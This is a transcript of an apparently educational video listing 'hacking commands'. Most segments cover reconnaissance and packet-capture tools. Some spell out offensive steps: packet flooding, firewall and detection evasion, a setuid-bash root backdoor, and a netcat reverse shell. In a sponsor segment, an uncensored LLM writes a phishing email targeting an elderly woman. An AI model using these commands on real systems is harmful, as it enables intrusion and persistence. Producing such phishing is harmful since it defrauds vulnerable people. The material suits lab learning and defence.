60 Hacking Commands You NEED to Know (27:01)

Uploader: NetworkChuck

Published at: 4/3/2024

Views: 706.8K

Video Transcription

Speaker 4

Here are the top 60 hacking commands you need to know.

I also brought in a few experts.

So get your coffee ready.

If you want to try these commands right now, I've got a free Kali Linux sandbox in the description.

Just click that link and right here in your browser, boom, hacking environment.

Make sure you read the instructions.

You've got two hosts to hack with.

Also, all the commands in this video are in the description below.

We even created this beautiful top hacking commands cheat sheet.

You gotta have this.

The humble ping command.

We ping a host to see if it's up, and if it's up, we'll hack it.

But right now we're sending a 64 byte packet.

What do you say we send something bigger?

To test firewall capabilities, we can type in ping dash S and specify the size of our packet, testing the capabilities of a firewall.

Or we can get even crazier.

We'll still send our large packet, ping dash S 1300, but then we'll use the switch dash F

to absolutely obliterate this host, flood a ton of packets. And actually, before we do that, I want to see this happen. I'll start another terminal and give you a bonus command here. This tool is called iftop. I'll install it with apt install iftop and then type in iftop to run. Now let's flood.

That's a lot of data. Control C to stop that, same for iftop. Goodbye.

And actually, let's keep iftop up because we're not done with ping yet.

I know you didn't realize there's so much to ping and this tool is kind of crazy.

It's called hping3.

We'll install it with apt install hping3, and we can do fun things like flooding packets on a specific port.

For example, port 80: hping3 dash S for a TCP packet, dash V for verbose mode gives us more info, dash dash flood to make it rain.

And finally the host here we go.

Go man.

Look at that.

And we're hitting port 80.

Great for testing web servers.

We can also use hping3 for a fancy traceroute: hping3 dash dash traceroute dash V. And then here's what's cool.

We'll do dash one for ICMP packets, and then our host, networkchuck.coffee.

but sometimes firewalls block ICMP with traceroute.

Removing dash 1, we can instead do dash P, 80, and dash S. Doing traceroute on port 80, which is web traffic, HTTP, using, of course, TCP.

And pick your port, maybe 443, maybe 53.

Use the DNS port, specifying dash dash UDP traffic.

Or with TCP traffic, we can add the dash A switch, setting the ACK flag, ACK.

And then change our base port with dash dash base port 1337, all amazing options to help us evade firewall rules.

Now, I bet you thought we were done with ping, but we're not.

You can tunnel TCP packets over ICMP echo reply and request packets.

What?

Check this out.

It happens with a tool called ptunnel.

apt install ptunnel.

On the target side, we'll simply run ptunnel.

On the attacker side, we'll run ptunnel, dash p for proxy address, that'll be our target, dash lp to specify our local port, we'll do 8000.

dash da for our destination address.

It'll also be our target, and we'll do dash dp for our destination port.

And because I'm going to try SSH, I'll do port 22 ready set tunnel.

Now to watch this happen in real time, I'm going to show you a new command.

tcpdump will help us to capture and visualize these packets in real time.

We'll use apt install tcpdump to install it.

and then we'll run tcpdump dash I for interface, and we'll say any, and we're only looking for ICMP traffic, so we'll type in ICMP.

Now watch this.

I'll launch a new terminal, and I'm gonna go over this tunnel using ICMP packets.

Oh my gosh, check this out.

SSH dash p for port, specifying 8000, and I'll do username networkchuck, that's my username at the other host, at localhost, pointing it right here on this computer, this server.

Ready, set, go.

Do you see it happening?

Oh my stinking gosh.

Literally sending SSH traffic over ICMP echo reply and echo request packets.

That's magic.

Who am I?

IP address.

Yep, I'm somewhere else.

That's so cool.

And control C to close those tunnels on both sides.

This is great for evading firewalls that might block that type of traffic.

Here's a quick command from TomNomNom.

Nom nom nom nom.

Speaker 1

I'm TomNomNom and this is a trick I use all the time.

If you're running a command and you don't know what you want to do with the output yet, pipe it to vim dash.

That'll open the output of the command in vim and then you can either manually edit it or you can use colon percent bang to run it back through any command you want.

Run it through sort to put things in order or grep dash v to remove lines you don't want.

And then as a bonus, if you have a file name under your cursor, hit g then f to open that file in a new buffer.

Speaker 4

Nmap will scan a network helping us to discover hosts that we can hack.

Here's some fun ways to use it.

First, make sure you install it.

apt install nmap.

We can scan an entire network for quick mapping with nmap -sn and then our target network.

Hey, it found 11 hosts.

The switch lowercase S capital V will do service discovery on a target.

Works like a charm.

Use the capital O switch for OS detection.

Well, hold up.

We tried, but it's blocking ping probes.

Let's try dash Pn to not do the probe.

We'll add that to our command dash capital P lowercase N bam.

We got it.

It's a windows PC.

We can use a lowercase s capital L switch to do quick hostname scanning on a network.

Nmap scripts unlock a whole new world.

We can scan for vulnerabilities on a host with dash dash script vuln, and then our target host or network.

We can use the malware script to scan for known malware.

With the capital A switch, we can scan for pretty much everything.

Take a little coffee break.

It'll take a while.

This one switch does OS detection, version detection, some default script scanning from Nmap, and the trace route.

That's a lot of info.

That's awesome.

If we use the lowercase F switch, it'll fragment our packets and make it harder for us to be detected while we're scanning.

We can also avoid detection by changing our source port.

Using the source port switch, we can just say, hey, I'm DNS, don't mind me.

And if you really wanna be tricky with Nmap, you can scan with decoys.

Check this out.

Nmap, dash capital D for decoys, and then specify RND, all capital, colon, let's say 10.

What that will do is generate 10 random IP addresses, random decoys that you're scanning from.

So they can't find you.

We'll put our host in and then bam scanning from 10 different IP addresses.

Now nmap is cool, but what if you have a lot to scan, like networks upon networks, and you want to scan them fast?

That's where masscan comes in.

We'll install masscan with apt install masscan.

Masscan is similar to nmap in that we can specify ports to scan for, specify a network, but then we can specify our rate

and go super fast, just like that.

Or if we have no idea what networks we're dealing with, we can scan everything by the entire 10 dot subnet range.

And we'll do a rate of 10,000.

Now it is fast, but you still might want to take a coffee break.

Just saying.

We'll just control C that. We can also use the randomize hosts switch to change the order in which we scan our hosts or networks, helping us stay a bit more hidden. Or we can quickly find servers foolishly running telnet on a network, super insecure, but we can find that out right now, simply by specifying port 23 and scanning an entire network fast.

Got one.

Now here's John Hammond with something a bit silly, but I love it though.

Speaker 3

You normally just enter ls on the command line to list stuff in the current directory.

Well, did you know that there is actually an sl command?

Like if you were typing really fast or you accidentally made a mistake or you had a typo when you meant to type ls and you accidentally typed sl, this is the Steam Locomotive.

And it is a train that is displayed on your computer screen on the command line, on the terminal.

And look, you can't get out of this.

You can't type anything.

You can't do anything.

You just have to wait for the whole train to drive by.

Now, the next fun hacking command that I want to show you is actually part of the dev piece of the file system.

I don't know if you're familiar, but there is a /dev/urandom file.

And that is like a device to list out pseudo random data just coming from your computer, right?

Hey, you have a stream, a constant stream of randomness.

And this looks hysterical.

It is just gibberish.

Nonsense, zeros and ones and all the data up to 255 ASCII characters, printable, non-printable, and it just looks like absolute chaos.

You can control C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell.

So it's something that you might be able to do as a troll.

as a meme, right? So what if we actually set an alias for that same ls command? Maybe we could set that to sl if we wanted to run the steam locomotive train again, but we could set that to cat /dev/urandom, and now anytime someone were to actually enter ls on the command line thinking that they're gonna list files, it'll just spit up and go crazy with all that random gibberish and nonsense.

Speaker 4

I think that's kind of fun.

By the way, John Hammond will show us a real hacking command he loves later in the video.

The whois command will tell you a ton of stuff about a domain.

Install it with apt install whois.

whois microsoft.com.

Fax number, phone number, address.

Let's try cia.gov.

Redacted. Should have expected that. WhatWeb will tell you what technologies a website is using. apt install whatweb to install it.

And then we'll type in whatweb and our domain.

We'll try networkchuck.coffee.

And while it's scanning perfect time for a coffee break.

It gives you a ton of information, including the fact that it's powered by Shopify right there.

Next up, curl from NahamSec.

Speaker 2

My favorite command is actually not using any hacking tools.

And it's probably one of the most basic commands used on Linux.

And it comes by default on almost any operating system.

And that is a curl command.

And let me show you real quickly how I use it.

The first thing I want to do is usually I just want to do a curl dash I.

That usually gives you the headers and every response in that header.

of what it is coming back from the server. So in this case it's giving us a 302 and it's saying, hey, you are going to get redirected to this exact location. And I like doing curl a lot because I'm hacking a lot of APIs most of the time, and with APIs I want to just quickly see if an endpoint is accessible or if I can fit some sort of data, and a lot of times I'm processing data as a part of my hacking recon, so it makes it a lot easier to do it through curl. And what you want to do for this one, for example, if you want to authenticate, instead of launching your browser and

setting this header manually, all you have to do is you can pass a header and set that custom header with its token in there and run it, and it will authenticate you and give you whatever data it is that you're looking for on that API.

Speaker 4

Hey, real quick, can I show you something crazy?

Check this out.

I'm about to run an uncensored version of ChatGPT or an LLM.

which means you can pretty much do whatever you want to do with it.

Now, why am I doing this?

Well, because Bitdefender just came out with a tool called Scamio.

It's a free AI-powered scam detector and prevention service from Bitdefender.

Like legit, check this out.

I got a text from a scam.

I'm pretty sure it is, but do I actually know?

Let me go find it.

Oh, yep.

Here's one.

Pretty sure this is a scam, but do I know? All I gotta do is copy that sucker and jump into Facebook Messenger.

Just one of the places I can chat with Bitdefender Scamio and see if things are scams.

So let's try it out.

Hey, is this a scam again?

This is totally free.

I'm just chatting with it here in Facebook messenger.

And within seconds, it told me that, Hey, it might be kind of suspicious.

Don't do anything with it.

Okay.

That's pretty cool.

That didn't fool it.

But what if I had this uncensored AI tool, try to produce a phishing message?

Can we trick it?

Let's try it out.

I need you to write a very convincing phishing email for an elderly woman named Deborah.

The goal is to get her to give me some money, use the best method, you know, and write it in a way that will avoid spam and fraud detection.

Let me add that.

And fraud detection snap.

Okay.

That's pretty good.

It even added this at the end.

It's awesome.

Okay.

Let's doctor it up just a little bit, remove like the, uh, "it's not a real URL" thing right there.

Let's add like a real looking number, like seven, six, five, zero, nine, eight, seven.

And I'll remove the "not a real number" thing here too. Cool.

Our message is ready.

Let's test it out.

Please tell me if this email is okay.

Now, while it's checking that, think about this, who in your family or in your friend group could benefit from having something like this.

I can't tell you how many times I'm getting a text from my grandma or my mom going, Hey, is this a scam?

Is this fraud?

But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams, it's actually powered by Bitdefender, the excellent security suite that I've talked about here on this channel a lot.

So all the information and knowledge they have is feeding Scamio, your free AI-powered tool.

Okay, the results are in. The email does seem suspicious. It tells you what tactics it might be using, and it tells you to contact your bank directly. That's perfect. That's what I would tell my grandma or my mom or my dad. So seriously, try it out right now, check the link below, it's free. You can chat with it here on the website or chat with it in Messenger. They'll be adding WhatsApp soon, and it'll check lots of things, like you can send a QR code and go, hey, is this good?

You can send that pictures of stuff.

This is a crazy powerful and free tool.

I love what Bitdefender is doing.

So again, definitely check it out.

And thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys.

Nikto is an open source web server scanner.

That'll scan websites for any dangerous, bad stuff.

You might have to install it.

We'll do apt install nikto.

And for a basic vulnerability scan, we'll do nikto dash h for our host and specify our host, networkchuck.

GoBuster can be used to find directory and files on a web server.

We'll install it with apt install gobuster.

To enumerate networkchuck.com, we'll do gobuster, type in dir for directories, that's the mode we're gonna be in.

We'll type in dash u and specify our domain.

networkchuck.com, and we'll use the dash w to specify our word list.

I'll use a default Kali Linux one here and go.

And it's discovering all my directories and files.

Now, because GoBuster is written in Go, it's extremely fast. Subdomain enumeration?

Yeah, we can use it for that.

But first we want to download a word list to get a ton of word lists right now on your system.

We'll use the tool called SecLists, apt install seclists.

Fair warning, this is pretty big.

Lots of word lists.

Once it's done downloading, you can find it in /usr/share/seclists.

Lots of stuff in there.

Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that.

It's called wget.

SecLists is also on GitHub, and it's maintained by my friends.

What we care about is discovery and DNS.

And we'll get Jason Haddix's list here.

I'm gonna grab the raw URL.

To install wget apt install wget, kind of seeing a pattern here, right?

Type in wget, paste that URL,

W got it.

Now getting back to gobuster.

We can enumerate domains.

We'll type in gobuster.

It'll be dns.

We'll specify our domain with dash d networkchuck.com.

And then our word list with dash w. I'll use Jason Haddix's DNS list. Ready, set, go.

Now that's a pretty big list.

And if I were doing a legit pen test, I probably let this finish out, but I don't have time for that.

I'm not patient enough.

Control C to stop that.

I want to show you another way to do subdomain enumeration.

This tool is called Sublist3r.

You can install it with apt install sublist3r, just like this.

And the E is a three.

And then to run Sublist3r, we'll simply type in sublist3r dash d to specify our domain, networkchuck.com, and let it go.

And it found a lot of stuff.

This next one is pretty fun.

It's called WPScan.

It will scan WordPress sites and help you find all the issues that might be affecting it.

Great if you're a WordPress site owner, and great if you're a pen tester. Let's try it out.

We can run it in a few ways.

The first way: wpscan, we'll do dash dash url and specify our URL.

We'll do chuckkeith.com my personal website.

That's not doing anything.

And then we'll do dash dash enumerate u. Not "you", the letter u.

The u stands for users.

Let's try it out.

That's a lot of information.

We can also use the p option for plugins.

We can use t for themes, or do something pretty aggressive.

We'll do vp, vt, dash dash plugins dash detection.

And we'll add aggressive at the end, just to make sure we get our point across.

This is a super aggressive vulnerability scan.

Let's try it out.

Now you may have noticed that all of those commands did not output anything fun, because you need an API token from WPScan, which you can get for free right now.

And then you would run the commands like this, specifying your API token.

with the dash dash API dash token switch.

Amass is another tool you can use for subdomain enumeration.

Install it with apt install amass, and to run it we'll type in amass, type in enum dash d to specify our domain, networkchuck.com, and let it go.

This tool might run forever,

I don't wanna wait for it though.

Control C to stop that, but man, look at all the stuff I found.

To do a more passive enumeration, you can do this, amass enum, and we'll specify dash passive, and then our domain.

Whereas the other one was a bit more active.

I like amass because it does give us options based on what our scope is.

And we'll go ahead and stop that.

This next command opens up the door to new commands.

What does that mean?

You'll see, it's a tool called Git, which we'll often use when you first start out to interact with GitHub.

Let me show you.

There's a tool we're about to use called searchsploit.

But the way we use this tool is by downloading it from GitHub.

And actually I lied.

This is a GitLab repository, but it's pretty much the same thing.

You'll use Git all the time to install all kinds of stuff.

But first we have to install Git.

apt install git.

You probably already have it.

And then probably my favorite command is git clone.

We're gonna clone a tool onto our computer.

And in our case, it will be searchsploit.

Let's go.

To properly use that command, we'll add a symbolic link.

We're not gonna talk about that.

Just know it's a command below.

And then finally, we can use the command searchsploit, right?

Yeah, it's gonna work.

Let's try searching for WordPress plugins.

It'll search for exploits that involve WordPress plugins.

What about SSH?

A ton of exploits pertaining to SSH.

Super handy tool.

If you want to update the database, searchsploit -u.

Crazy powerful tool.

Now here's John Hammond with a real hacking command.

It's kind of awesome.

Speaker 3

Let me get into the real genuine ethical hacking and penetration testing.

My favorite top hacking command.

Here's the thing.

When you're on the command line interacting with the shell, you're actually running this program called Bash, or the Bourne-again shell.

Now that lives on the file system in /bin/bash.

So if I were to actually execute this, it doesn't look like it does anything.

I just get the prompt back because I've just invoked and I'm running a shell or terminal inside my shell.

So I could exit out of that and get back to my original prompt, but /bin/bash actually takes a special argument called -p, and that will enforce and maintain setuid permissions, which means that the owner of the file, root in this case, the admin, absolute controller of the computer, will be able to keep their permissions,

but it has to be a setuid binary.

So the way that we could do that is actually chmod, or CH modifications, change modifications on the file, and add or plus the s letter for setuid.

We'll put that on /bin/bash, and this will require some root privileges.

That means that you need to be the admin to be able to configure this, but what that ultimately does is create a backdoor, where you have a persistence mechanism, a little bit of a foothold, so that at any point, if we configure this with our sudo password, later on down the line, you get access to this machine one more time.

Now you can just run bash -p,

and you are root.

You control the whole machine because you are the admin user.

You set up that back door.

If you wanted to, you could move into the root directory and you could do anything that you want.

Maybe we could echo hello into a "please subscribe to NetworkChuck" file.

I'll hit enter on that.

And now if I zoom out, let me show you this, ls -la, we can see our file right there.

Please subscribe to Network Chuck.

Hey, just owned and controlled by the root user.

And we were able to configure that with our backdoor, sudo chmod +s /bin/bash.

That is my favorite top hacking command because then you've got a backdoor.

You've got a persistence mechanism and a way to become root at any point.

I hope you enjoyed a couple of those really neat, hey, top hacking commands, but thank you so much, Network Chuck, for letting me join the party here.

This was an absolute blast.

Speaker 4

Now, I'm gonna do something bad.

I'm gonna do the same command twice.

What?

No, I know, it's okay.

We're gonna talk about tcpdump again.

Why?

Well, because there's more cool stuff about it and we didn't give it enough time.

We'll type in tcpdump, we'll type in dash w to send it to a file.

We'll just call it capture.pcap.

Then dash i for our interface, and we'll do ethernet zero.

That's the one I have now.

Let me just make sure that's the case.

IP address, yes, ethernet zero.

And go.

Now we'll generate some traffic.

Do something fun that we've already learned.

Nmap with random addresses.

We'll stop that with control C. We can analyze that traffic with this command, tcpdump -r, specify our capture file, which is capture.pcap.

Let's take a look.

Cool, we can see it.

We can also limit the amount of packets we capture with tcpdump and the switch dash C for count, and we'll say like 100.

That did not take long.

Now tcpdump is pretty cool.

Great for quick captures, but the real tool you wanna use.

that's crazy powerful is Tshark, the command line brother of Wireshark.

To install Tshark, we'll do apt install Tshark.

Tshark can do a lot, let's try a few things.

First we'll type in Tshark, and we'll capture one packet, just one.

We'll put it in verbose mode with dash capital V,

We'll do dash C for count, we'll do one, and then dash I, ethernet zero.

One packet captured, and then look at all the stuff it shows us.

That is so powerful.

Networking geeks are just drooling, so yes, I'm drooling.

Do you wanna see something crazier?

Filters, watch this.

Tshark, we'll do a dash Y to apply a display filter, and with a single quote, we'll specify it.

We'll do http.request.method, space, equals, equals, and a double quote to get, and then close it out with a single quote.

I know it's kinda wordy, but check this out.

Let's specify our interface.


eth0, and we're now capturing and only showing GET requests.

How cool is that?

Let's generate some. curl academy.networkchuck.com.

There's another one.

That's so cool.

Now one of the most powerful ways we can use Tshark is by analyzing packet captures.

So let's do a capture real quick to a file, Tshark, and actually no, I'm gonna show you one cool thing.

We'll use a command called timeout and put in 15 seconds and it will timeout or stop this packet capture in 15 seconds.

That's pretty cool.

Tshark dash i eth0.

And with the dash w command, similar to tcpdump, we'll send that to a file, tshark.pcap.

Let me try to generate some quick traffic.

And done.

To display statistics and specifically to follow endpoint connections, use this command, tshark dash r. We'll specify our capture, which was tshark dot pcap.

Then we'll use the switches dash qz and specify endpoints comma ip.

How cool is that?

We can also follow a TCP stream with tshark -r, our capture, dash qz, and we'll say follow, comma, tcp, and we'll put that in ASCII.

So ASCII, we'll do comma, we'll follow the seventh stream.

That's pretty cool.

Let's try, I don't know, the first stream.

First stream's crazy.

Let's do the 20th stream.

100th stream.

So powerful.

We could also simply do custom output of fields based on the capture we're reviewing.

Check this out.

Tshark.

Do a dash E, IP dot source.

Dash E, IP dot dest, or DST.

Dash E, frame dot protocols.

Notice we're specifying fields.

We'll do a dash T, fields, which is telling it to only output the fields we're specifying.

And then finally dash R specifying your capture.

How cool is that?

So powerful.

This is my new favorite tool, tmux, a terminal multiplexer.

Install tmux with apt install tmux.

And then simply type in tmux.

We suddenly have a new terminal that we can do stuff in, like pinging academy.networkchuck.com.

Leave that there, hit control B and then D on your keyboard.

You're detached from it, and then with tmux a, get right back to it.

How powerful is that?

I'll stop this, type exit to close that out.

We can create multiple sessions and name them.

So tmux new dash s and name it Bob.

Here's Bob.

We'll ping something here.

Detach from that.

Create another session.

Susie.

And if I type in tmux ls, I've got two sessions and I can reattach to either of them.

tmux a dash t to specify my target, we'll say Susie,

jumping right back in there.

I can hit control B and then w to quickly jump between my various tmux sessions.

And I can leave, go to another computer, jump back in here, and connect to any one of these sessions.

If you wanna learn more, I did a whole video on tmux right up here.

SSH, we use it all the time to remote into our systems.

So for example, this Ubuntu guy.

To jump into him, I'll use SSH.

SSH.

networkchuck at his IP address.

Already cool, but it can do more.

Instead of logging in, I can actually just run a command via SSH on another system.

With SSH, networkchuck at my server.

And then right after that, specify the command I want to run.

So in single quotes, I can say, who am I?

Bam.

Or IP address.

Crazy powerful. Let's get crazier. You can actually make it a SOCKS proxy. What? Watch this. Before I create the tunnel, let me demonstrate my location right now. What's my IP address? I'm in Dallas, Texas, as you can see right here. But if I use this crazy SSH command, I'll create a proxy and tunnel myself somewhere else: ssh dash D, which is telling it to create a SOCKS proxy, and I'll say port 1337. We'll do a dash C for compression, dash q for quiet mode, and dash N to not execute any commands.

And finally, our server information.

Root, at, and this will be a server in Japan.

Put our password in.

Now we're gonna launch Chromium using that proxy.

Our SOCKS5, the local host.

Ready, set, go.

Chromium's launched.

Now let's see where we are.

It's already feeling a bit different.

And given that I'm having a hard time figuring out where to go, I'm definitely in Osaka, Japan.

Super cool, right?

Netcat, our go-to for reverse shells.

To install Netcat, we'll do apt install netcat-traditional.

To verify, just type in nc -h. And with Netcat installed on both your attacking computer and your target computer, let's do a reverse shell.

On the attacker, all we gotta do is wait.

Wait for the shell.

Type in nc -lvp and the port you're waiting on, 1337.

We're waiting, because on a reverse shell, the target reaches out to us.

On the target side, we'll type in nc for Netcat.

We'll do a dash E and specify the shell we wanna have access to.

So we'll do forward slash bin, forward slash sh, specify our attacker IP, which is us, and the port, 1337, that the attacker is listening on.

And then we'll hit enter, and something happened?

It sure stinkin' did, check it out.

I'm on the other computer.

I've got a reverse shell.

Now you can also do a fun thing where you just set up a simple chat server with Netcat.

Why?

I don't know, but you can do it.

You should try it, it's fun.

On one side, you type in nc -lvp, set a port.

On the other side, type in nc -v, the IP address of the other computer, and the port.

So now I can say, hey, and I get hey on the other side.

What are you thinking about? The end of this video.

Me too.

I'll catch you guys next time.

For real though.

Bye.